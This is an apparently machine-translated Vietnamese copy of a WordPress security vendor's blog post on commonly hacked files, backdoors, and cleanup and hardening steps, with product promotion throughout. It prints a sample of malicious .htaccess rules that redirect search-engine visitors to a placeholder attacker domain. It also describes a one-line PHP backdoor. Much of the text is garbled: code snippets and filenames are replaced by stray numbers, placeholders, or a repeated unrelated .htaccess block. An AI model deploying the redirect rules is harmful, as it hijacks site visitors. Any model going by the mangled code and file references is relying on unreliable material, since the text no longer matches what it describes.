Tải php wordpress

Nếu bạn tìm thấy các tệp không xác định, chẳng hạn như wp-load-eFtAh.php trong thư mục gốc của trang web WordPress, thì có khả năng trang web của bạn đã bị tấn công. Trong các tệp này, bạn sẽ chỉ tìm thấy 1 dòng mã có bản chất độc hại. Mã này là một cửa hậu cho phép tin tặc thực thi mã PHP, lệnh hệ thống, kết nối với cơ sở dữ liệu WordPress, v.v.

Các tệp như vậy thường không được phát hiện bởi các trình quét phần mềm độc hại truyền thống và do đó chúng bị khai thác rộng rãi

Tải php wordpress

Tên tệp phổ biến

  • wp-load-eFtAh. php
  • wp-load-qPrOj. php
  • wp-load-sJgKb. php

Lo lắng về bảo mật WordPress? . Bảo mật trang web WordPress của tôi ngay bây giờ

WordPress đã làm cho việc xây dựng trang web trở nên cực kỳ dễ dàng và đã cho phép các cá nhân và tổ chức thuộc mọi quy mô có sự hiện diện trực tuyến

Blog này bao gồm

Khi lưu trữ trang web WordPress của bạn, chăm sóc bảo mật của nó là điều cần thiết. Điều cuối cùng bạn muốn xảy ra là thức dậy vào buổi sáng và thấy trang web của mình bị tấn công và tất cả các nỗ lực phát triển và SEO của bạn đã đổ sông đổ bể mà bạn không hề hay biết 🙁

Do tính phổ biến của nó, tin tặc có xu hướng nhắm mục tiêu vào WordPress cùng với các chủ đề và plugin của nó. Nếu họ tìm thấy lỗ hổng trong một plugin, họ sẽ dễ dàng khai thác gần như tất cả các trang web đã cài đặt plugin đó.

Hướng dẫn liên quan – Loại bỏ phần mềm độc hại WordPress

Lấy lỗ hổng gần đây trong plugin Contact Form 7 làm ví dụ. Người ta ước tính rằng hơn 5 triệu trang web sử dụng plugin Contact Form WordPress đã bị tấn công sau khi lỗ hổng được đưa ra ánh sáng. Các lỗ hổng trong phần bổ trợ cho phép kẻ tấn công chỉ cần tải lên bất kỳ loại tệp nào, bỏ qua tất cả các hạn chế đối với các loại tệp có thể tải lên được phép trên một trang web. Hơn nữa, nó cho phép kẻ tấn công đưa nội dung độc hại như web shell vào các trang web đang sử dụng plugin Contact Form 7 phiên bản dưới 5. 3. 1 và bật tính năng tải lên tệp trên các biểu mẫu

Tương tự, có một lỗ hổng LFI trong plugin ‘Slider Revolution’ khiến tin tặc có thể tải xuống wp-config.php từ các trang web WordPress dễ bị tấn công. Điều này dẫn đến rò rỉ thông tin đăng nhập cơ sở dữ liệu, khóa mã hóa và thông tin cấu hình nhạy cảm khác về một trang web. Điều này bắt đầu được gọi là wp-config. hack php

30.000 trang web bị tấn công mỗi ngày. Bạn là người tiếp theo phải không?

Bảo vệ trang web của bạn khỏi phần mềm độc hại và tin tặc bằng Bảo vệ trang web trước khi quá muộn

Bắt đầu

7 ngày dùng thử miễn phí

Trong hướng dẫn này, chúng tôi sẽ nói về tất cả các tệp và vị trí quan trọng trên trang web WordPress của bạn có thể là mục tiêu của tin tặc và phần mềm độc hại

1) WordPress wp-config. hack php

wp-config.php là một tệp quan trọng cho mọi cài đặt WP. Nó là tệp cấu hình được sử dụng bởi trang web và đóng vai trò là cầu nối giữa hệ thống tệp WP và cơ sở dữ liệu. Tệp wp-config.php chứa thông tin nhạy cảm như

  • Máy chủ cơ sở dữ liệu
  • Tên người dùng, mật khẩu và số cổng
  • Tên cơ sở dữ liệu
  • Khóa bảo mật cho WordPress
  • Tiền tố bảng cơ sở dữ liệu

Hướng dẫn liên quan – Hướng dẫn từng bước hoàn chỉnh về bảo mật WordPress (Giảm 90% nguy cơ bị hack)

Do tính chất nhạy cảm của nó, nó là mục tiêu phổ biến của tin tặc. Năm ngoái, một lỗ hổng nghiêm trọng đã được tìm thấy trong plugin WP Duplicator. Có lỗ hổng Tải xuống tệp tùy ý không được xác thực cho phép tin tặc tải xuống tệp wp-config

Khi tin tặc nắm được chi tiết đăng nhập cơ sở dữ liệu thông qua vụ hack wp-config.php, chúng sẽ cố gắng kết nối với cơ sở dữ liệu và tạo tài khoản quản trị viên WP giả cho chính chúng. Điều này cho phép họ truy cập đầy đủ vào một trang web và cơ sở dữ liệu. Dữ liệu nhạy cảm như — mật khẩu người dùng, id email, tệp, hình ảnh, chi tiết giao dịch WooC Commerce, v.v. sẽ bị tin tặc tiếp xúc. Để tiếp tục truy cập vào trang web WordPress của bạn, họ cũng có thể cài đặt các tập lệnh như cửa hậu Filesman

Tải php wordpress
Làm thế nào để sửa chữa một trang web WordPress bị tấn công

2) Chỉ mục WordPress. php bị tấn công

Tệp index.php là điểm truy cập vào mọi trang web WordPress. Vì điều này sẽ chạy với mọi trang trên trang web của bạn, nên tin tặc sẽ tiêm mã độc làm ảnh hưởng đến toàn bộ trang web của bạn

Ví dụ: phần mềm độc hại pub2srv & phần mềm độc hại Favicon nhắm mục tiêu tấn công tệp index.php. Các nhà nghiên cứu tại Astra Security đang theo dõi chiến dịch chuyển hướng phần mềm độc hại có mức độ lây lan lớn này và thấy rằng mã độc như

1và mã trong ảnh chụp màn hình bên dưới đã được thêm vào chỉ mục. tập tin php

Tải php wordpress
Đã tìm thấy mã độc hại được chèn vào chỉ mục. php của bản cài đặt WordPress

Một số chiến dịch phần mềm độc hại cũng đổi tên tệp index.php thành

3 và khiến trang web bị sập và không tải được

Mã độc như vậy trong tệp index.php có thể khiến khách truy cập trang web nhìn thấy cửa sổ bật lên, quảng cáo lạ hoặc thậm chí bị chuyển hướng đến các trang web spam khác. Để khắc phục sự cố như vậy, hãy so sánh nội dung của tệp này với bản gốc do WordPress phát hành

Hướng dẫn liên quan – Hướng dẫn loại bỏ hack WordPress cuối cùng

3) WordPress. htaccess bị hack

Tệp

5 thường được tìm thấy ở vị trí trang chủ của trang web WordPress của bạn, giúp định cấu hình cài đặt máy chủ theo yêu cầu của trang web. Điều này thường được tìm thấy trong các máy chủ Apache. Tệp
5 là một thành phần rất mạnh để kiểm soát hiệu suất và hành vi của máy chủ web của bạn. Nó cũng có thể được sử dụng để kiểm soát tính bảo mật của trang web của bạn. Một số cách sử dụng phổ biến của tệp
5 là

  • Hạn chế quyền truy cập vào các thư mục nhất định của trang web
  • Định cấu hình mức sử dụng bộ nhớ tối đa của trang web
  • Tạo chuyển hướng
  • Bắt buộc HTTPS
  • Quản lý bộ nhớ đệm
  • Ngăn chặn một vài cuộc tấn công tiêm tập lệnh
  • Kiểm soát kích thước tệp tải lên tối đa
  • Ngăn bot tìm tên người dùng
  • Chặn liên kết nóng hình ảnh
  • Buộc tự động tải xuống tệp
  • Quản lý phần mở rộng tập tin

Tuy nhiên, khi bị tấn công, các tính năng này có thể được sử dụng để thu thập các nhấp chuột cho kẻ tấn công. Thông thường, tệp_______0_______5 được tiêm mã độc để chuyển hướng người dùng. Đôi khi nó được sử dụng để hiển thị thư rác cho người dùng. Ví dụ, hãy nhìn vào đoạn mã được đưa ra dưới đây

RewriteEngine On
 RewriteOptions inherit
 RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
 RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]

Mã độc ở dòng cuối cùng đang chuyển hướng lưu lượng người dùng khỏi trang web. Do đó, người dùng được chuyển hướng đến

9. Sau đó, nó cố tải tập lệnh
0. Nếu bạn nhận thấy chuyển hướng bất thường từ trang web của mình, có thể là do tệp tin bị hack
5. Tuy nhiên, nếu bạn không tìm thấy tệp hoặc nếu nó trống – đừng hoảng sợ vì tệp này không bắt buộc (trừ khi bạn đang sử dụng các URL đẹp trong WordPress)

4) WordPress 2 & 3 (Tệp chủ đề WordPress bị tấn công)

Mỗi chủ đề WordPress có một tệp có tên là

2 và
3 chứa mã cho chân trang và đầu trang của trang web. Khu vực này bao gồm các tập lệnh và một số tiện ích nhất định vẫn giữ nguyên trên toàn bộ trang web. Ví dụ: tiện ích chia sẻ hoặc tiện ích mạng xã hội ở cuối trang web của bạn. Hoặc đôi khi nó có thể chỉ là thông tin bản quyền, tín dụng, v.v.

Vì vậy, hai tệp này là những tệp quan trọng có thể là mục tiêu của những kẻ tấn công. Nó thường được sử dụng để chuyển hướng phần mềm độc hại và hiển thị nội dung spam như trường hợp của digestcolect[. com] Chuyển hướng phần mềm độc hại

Các trang web bị tấn công có thể chứa mã vô nghĩa trong các tệp này như bạn có thể thấy trong ảnh chụp màn hình bên dưới

Tải php wordpress
Một ví dụ về sự vô nghĩa được chèn vào tiêu đề. tập tin php

Chúng tôi đã giải mã một số điều này và phát hiện tin tặc tận dụng cookie của trình duyệt để xác định người dùng và hiển thị cho họ các quảng cáo độc hại, v.v.

Hơn nữa, trong một trường hợp khác, những kẻ tấn công đã chèn mã JavaScript vào tất cả các tệp có. tiện ích mở rộng js. Do sự lây nhiễm quy mô lớn, việc làm sạch các bản hack như vậy thường trở nên khó khăn

Nhận danh sách kiểm tra bảo mật WordPress cuối cùng với hơn 300 thông số kiểm tra

Nhận danh sách kiểm tra ngay bây giờ.

5) Chức năng WordPress. php bị tấn công

Tệp chức năng trong thư mục chủ đề hoạt động như một plugin sẽ. Điều đó có nghĩa là nó có thể được sử dụng để thêm các tính năng và chức năng bổ sung cho trang web WordPress. Tệp

6 có thể được sử dụng cho

  • Gọi các sự kiện/chức năng WordPress
  • Để gọi các hàm PHP gốc
  • Hoặc để xác định các chức năng của riêng bạn

Tệp

6 có trong mọi chủ đề, nhưng điều quan trọng cần lưu ý là tại bất kỳ thời điểm nào, chỉ có một tệp
6 được thực thi – tệp trong chủ đề đang hoạt động. Do đó, các tệp
6 đã bị kẻ tấn công tích cực nhắm đến trong Vụ tấn công cửa sau Wp-VCD. Phần mềm độc hại này đã tạo quản trị viên mới và chèn các trang spam vào trang web, chẳng hạn như thư rác Pharma và SEO Nhật Bản

Như có thể thấy rõ từ đoạn mã trên, tệp này bao gồm lớp. mô-đun chủ đề. tệp php. Sau đó, tệp này được sử dụng để cài đặt phần mềm độc hại vào các chủ đề khác được cài đặt trên trang web của bạn (ngay cả khi chúng bị tắt). Do đó tạo ra người dùng mới và cửa hậu. Điều này cho phép kẻ tấn công truy cập trang web ngay cả sau khi tệp được dọn sạch

Bảo vệ trang web WordPress của bạn trước khi tin tặc cố gắng tấn công trang web.

Astra Website Protection đã giúp hàng ngàn trang web WordPress ngăn chặn các cuộc tấn công mạng

Bắt đầu

6) WordPress wp-tải. php bị tấn công

# Kill PHP Execution

deny from all
0 là một tệp quan trọng cho mọi trang web WordPress. Tệp
# Kill PHP Execution

deny from all
0 giúp khởi động môi trường WordPress và cung cấp cho plugin khả năng sử dụng các chức năng lõi WP gốc. Nhiều biến thể phần mềm độc hại lây nhiễm các trang web WordPress bằng cách tạo các tệp wp-load độc hại như đã thấy trong trường hợp phần mềm độc hại China Chopper Web shell. Hành vi điển hình này là tạo các tệp như
# Kill PHP Execution

deny from all
2 trên máy chủ. Vì tên giống với tên của tệp gốc nên bạn có thể không thấy nghi ngờ khi đăng nhập vào FTP. Các tệp này sẽ chứa các mã như

________số 8_______

Mã này cho phép kẻ tấn công chạy bất kỳ mã PHP nào trên trang web do tin tặc gửi trong tham số

# Kill PHP Execution

deny from all
3. Sử dụng cửa hậu này, các lệnh có hại có thể được thực thi. Chẳng hạn, lệnh —
# Kill PHP Execution

deny from all
4 có thể giết các tiến trình của máy chủ web. Điều này có thể tắt toàn bộ máy chủ. Đừng đánh giá mã này bằng độ dài của nó – nó đủ nguy hiểm để điều khiển máy chủ của bạn từ xa

7) Tràn ngập class-wp-cache. tập tin php trên máy chủ

Trong một trong những vụ hack gần đây, chúng tôi đã thấy rằng cPanel và toàn bộ máy chủ web nhận được hàng chục hoặc thậm chí hàng nghìn tệp

# Kill PHP Execution

deny from all
5. Mọi thư mục của trang web bao gồm các tệp cốt lõi đều bị nhiễm các tệp độc hại này. Thông thường, nguyên nhân của sự lây nhiễm này là một lỗ hổng trong mã trang web mở ra lối vào cho tin tặc

Cách thực hiện dọn dẹp tệp WordPress và bảo mật chúng

1) Dọn dẹp tập tin

Trước tiên, hãy điều tra nguyên nhân của các cuộc tấn công như wp-config. hack php. Sau đó xóa mã độc hại/vô nghĩa. Thứ hai, khôi phục các tệp bị nhiễm từ bản sao lưu mà bạn có thể có. Trong trường hợp không có bản sao lưu, bạn có thể kiểm tra các tệp WordPress gốc trong GitHub. Đừng quên sao lưu các tệp trước khi bạn thực hiện bất kỳ thay đổi nào. Bất kỳ sai lầm nào trong quá trình xóa mã đều có khả năng làm hỏng trang web của bạn

2) Bảo mật trang web bằng plugin

Với những vụ hack như vậy, các tệp CMS cốt lõi thường bị tin tặc sửa đổi. Điều quan trọng là phải kiểm tra xem có bất kỳ tệp WordPress cốt lõi nào của bạn bị sửa đổi không. Khách hàng của Astra Security đã có tính năng này và được thông báo tự động nếu phát hiện bất kỳ thay đổi nào như vậy

Tải php wordpress
Phát hiện thay đổi tệp lõi trong Trình quét phần mềm độc hại của Astra

Astra Security cũng cung cấp cơ chế đánh giá sẵn có để xem xét các thay đổi tệp này

Tải php wordpress
Kiểm tra sự khác biệt của tệp, ảnh chụp màn hình từ trình quét phần mềm độc hại của Astra

Sau khi bạn đã xem xét các thay đổi trong các tệp hệ thống cốt lõi, bạn sẽ phải quét trang web của mình bằng giải pháp Quét phần mềm độc hại, chẳng hạn như Astra Website Protection để xác định các tệp có nội dung độc hại trong đó. Những công cụ như vậy cung cấp cho bạn báo cáo quét đầy đủ về các tệp phần mềm độc hại, liên kết độc hại, lý do hack, v.v.

3) Ẩn các tập tin nhạy cảm

Việc để lộ tập tin trước những con mắt tò mò có thể tiết lộ thông tin nhạy cảm như chúng ta đã nói về vụ hack wp-config.php trong bài viết này. Do đó, cần phải ẩn các tệp này trên máy chủ. Tệp

5 có thể giúp bảo mật các tệp này

Để ngăn không cho bất kỳ ai truy cập bất kỳ tệp PHP nào trong thư mục 

# Kill PHP Execution

deny from all
8, bạn có thể tạo tệp
5 trong thư mục
# Kill PHP Execution

deny from all
8 và thêm đoạn mã sau vào đó

# Kill PHP Execution

deny from all

Để ẩn các tệp nhạy cảm trong thư mục

# Block wp-includes folder and files
 
 RewriteEngine On
 RewriteBase /
 RewriteRule ^wp-admin/includes/ - [F,L]
 RewriteRule !^wp-includes/ - [S=3]
 RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
 RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
 RewriteRule ^wp-includes/theme-compat/ - [F,L]
 
1, hãy thêm mã sau vào tệp
5 trong thư mục gốc của trang web của bạn

# Block wp-includes folder and files
 
 RewriteEngine On
 RewriteBase /
 RewriteRule ^wp-admin/includes/ - [F,L]
 RewriteRule !^wp-includes/ - [S=3]
 RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
 RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
 RewriteRule ^wp-includes/theme-compat/ - [F,L]
 

Bạn cũng có thể chọn bỏ qua toàn bộ quá trình này và chỉ cần cài đặt Plugin WP Hardening. Plugin này ẩn các tệp nhạy cảm như wp-contents, wp-uploads, v.v. chỉ với một nút bật tắt. Thêm vào WP-Hardening này cũng giúp bảo vệ một số khu vực bảo mật quan trọng khác trong trang web của bạn, khiến kẻ tấn công khó xác định thông tin nhạy cảm và khai thác nó

Hướng dẫn liên quan – Hướng dẫn từng bước để loại bỏ phần mềm độc hại WordPress

4) Cập nhật WordPress

Luôn cập nhật bản cài đặt WP, plugin và chủ đề của nó. Một số lượng lớn các lỗ hổng có thể được khắc phục bằng cách chạy bản cài đặt cập nhật. Chỉ sử dụng các plugin và chủ đề có uy tín. Tránh các chủ đề được mã hóa kém hoặc không có giá trị. Điều này sẽ ngăn chặn các cuộc tấn công như vụ hack wp-config.php

Để giải thích điều này rõ hơn, chúng tôi đã tạo một video hoàn chỉnh từng bước để bảo mật trang web WordPress của bạn

5) Sử dụng Tường lửa WordPress

Tường lửa đi một chặng đường dài trong việc bảo vệ trang web của bạn. Tường lửa có thể giám sát lưu lượng truy cập đến trên trang web của bạn và thực hiện các biện pháp phòng ngừa để chặn lây nhiễm. Nó có thể ngăn chặn hiệu quả các cuộc tấn công như vụ hack wp-config.php. Có nhiều giải pháp tường lửa hiệu quả về chi phí có sẵn trên thị trường hiện nay. Dịch vụ tại Astra Security linh hoạt và phù hợp với nhu cầu của bạn

Tải php wordpress
Cách Tường lửa ứng dụng web Astra bảo vệ bạn

Tường lửa Astra ngăn chặn các cuộc tấn công như SQLi, tiêm mã, XSS, CSRF và hơn 100 mối đe dọa mạng khác trong thời gian thực. Nó cũng phát hiện và chặn các thông tin đăng nhập bất thường và giả mạo vào phiên bản của bạn, đồng thời quét trang web của bạn một cách tự động và thường xuyên

Xem Tường lửa thông minh và Trình quét phần mềm độc hại hoạt động

Ngăn chặn các bot xấu, SQLi, RCE, XSS, CSRF, RFI/LFI và hàng nghìn cuộc tấn công mạng và nỗ lực hack

Dùng thử bản dùng thử miễn phí

Hãy cho chúng tôi biết nếu bạn thích nó 😃

6) Kiểm tra bảo mật WordPress hoặc kiểm tra bút

Với việc WordPress là CMS phổ biến nhất được sử dụng và do đó là nơi gia tăng các vấn đề bảo mật, những kẻ tấn công luôn rình mò các lỗ hổng có thể khai thác trên các trang web WordPress. Do đó, Pen-Testing một trang web WordPress đã trở nên cần thiết để giữ an toàn cho nó khỏi các cuộc tấn công

Kiểm tra thâm nhập là một cuộc tấn công mô phỏng được thực hiện đối với một ứng dụng web, mạng hoặc hệ thống máy tính để đánh giá tính bảo mật của nó và tìm bất kỳ lỗ hổng nào mà nó có trước kẻ tấn công, do đó giúp bảo vệ nó. Một trong những cuộc tấn công mô phỏng khác nhau được thực hiện trong khi Pen-Testing một trang web WordPress sẽ là kiểm tra lỗ hổng Danh sách thư mục về cơ bản lập chỉ mục các thư mục nhạy cảm như wp-gộp, wp-index. php,  wp-config. php, wp-admin, wp-tải. php, nội dung wp, v.v. và do đó có thể cung cấp cho kẻ tấn công thông tin nhạy cảm

Khắc phục hơn 12 sự cố bảo mật chỉ bằng một cú nhấp chuột bằng cách sử dụng Plugin WP Hardening miễn phí của chúng tôi

Tải php wordpress

Hướng dẫn liên quan – Hướng dẫn từng bước hoàn chỉnh về bảo mật WordPress (Giảm 90% nguy cơ bị hack)

Bài đăng này có hữu ích không?

37

Không 6

thẻ. quyền truy cập tệp wordpress, tệp Wordpress, tường lửa Wordpress, Wordpress bị hack, kiểm tra bảo mật Wordpress, wp-config. php bị hack

Làm cách nào để chèn mã PHP vào trang WordPress mà không cần plugin?

Nếu bạn muốn thêm mã PHP vào trang hoặc trình chỉnh sửa bài đăng thì cách tốt nhất là tạo mã ngắn tùy chỉnh trong chức năng. tệp php đại loại như. function list_pages_function( $atts ) { return wp_list_pages('sort_column=menu_order');

Làm cách nào để tải chức năng WordPress trong tệp PHP tùy chỉnh?

Đang tải WordPress trong tệp PHP tùy chỉnh bên ngoài của bạn . define( 'WP_USE_THEMES', false ); require_once( $_SERVER[ 'DOCUMENT_ROOT' ] . '/wp-load. php' ); Bạn có thể đặt WP_USE_THEMES thành true nếu bạn cần tải các tệp mẫu của chủ đề hiện tại.

WP tải tệp PHP là gì?

wp-load. php chịu trách nhiệm khởi động môi trường WordPress giúp plugin có thể sử dụng chức năng WordPress Core gốc .

Chúng ta có thể sử dụng PHP trong trang web WordPress không?

Phần lớn phần mềm cốt lõi của WordPress được viết bằng PHP , điều này làm cho PHP trở thành ngôn ngữ rất quan trọng đối với cộng đồng WordPress. Một số người thích nói rằng ngôn ngữ lập trình PHP đã chết nhưng điều đó không đúng.